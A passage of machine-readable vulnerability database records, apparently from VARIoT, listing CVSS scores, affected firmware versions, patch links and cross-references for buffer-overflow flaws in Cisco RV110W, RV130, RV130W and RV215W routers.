"CNVD-2021-41180", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-977", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374261", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNNVD", "id": "CNNVD-202101-977" }, { "db": "NVD", "id": "CVE-2021-1207" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1207" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1207", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002645", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41180", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-977", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374261", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNNVD", "id": "CNNVD-202101-977" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "id": "VAR-202101-0813", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" } ] }, "last_update_date": "2024-11-23T21:34:59.589000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41180)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272341" }, { "title": "Cisco Repair measures for multiple product input verification errors", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139081" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNNVD", "id": "CNNVD-202101-977" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374261" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1207" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNNVD", "id": "CNNVD-202101-977" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "VULHUB", "id": "VHN-374261" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "CNNVD", "id": "CNNVD-202101-977" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41180" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374261" }, { "date": "2021-09-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-977" }, { "date": "2021-01-13T22:15:19.457000", "db": "NVD", "id": "CVE-2021-1207" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41180" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374261" }, { "date": "2021-09-28T08:37:00", "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-977" }, { "date": "2024-11-21T05:43:49.703000", "db": "NVD", "id": "CVE-2021-1207" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-977" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002645" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-977" } ], "trust": 0.6 } }
var-202101-0829
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0829", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "cve": "CVE-2021-1185", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1185", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41202", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374239", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1185", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1185", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1185", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1185", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1185", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41202", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-990", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374239", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNNVD", "id": "CNNVD-202101-990" }, { "db": "NVD", "id": "CVE-2021-1185" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1185" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1185", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002660", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41202", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-990", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374239", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNNVD", "id": "CNNVD-202101-990" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "id": "VAR-202101-0829", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" } ] }, "last_update_date": "2024-11-23T21:34:59.074000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41202)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272451" }, { "title": "Multiple Cisco Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139522" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNNVD", "id": "CNNVD-202101-990" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374239" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1185" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNNVD", "id": "CNNVD-202101-990" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41202" }, { "db": "VULHUB", "id": "VHN-374239" }, { "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "db": "CNNVD", "id": "CNNVD-202101-990" }, { "db": "NVD", "id": "CVE-2021-1185" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41202" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374239" }, { "date": "2021-09-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-990" }, { "date": "2021-01-13T22:15:17.833000", "db": "NVD", "id": "CVE-2021-1185" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41202" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374239" }, { "date": "2021-09-29T03:04:00", "db": "JVNDB", "id": "JVNDB-2021-002660" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-990" }, { "date": "2024-11-21T05:43:46.697000", "db": "NVD", "id": "CVE-2021-1185" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-990" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002660" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-990" } ], "trust": 0.6 } }
var-202007-1014
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202007-1014", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rv110w", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130w wireless-n multifunction vpn routerr", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "cisco", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:cisco:rv110w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv215w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008401" } ] }, "cve": "CVE-2020-3145", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": 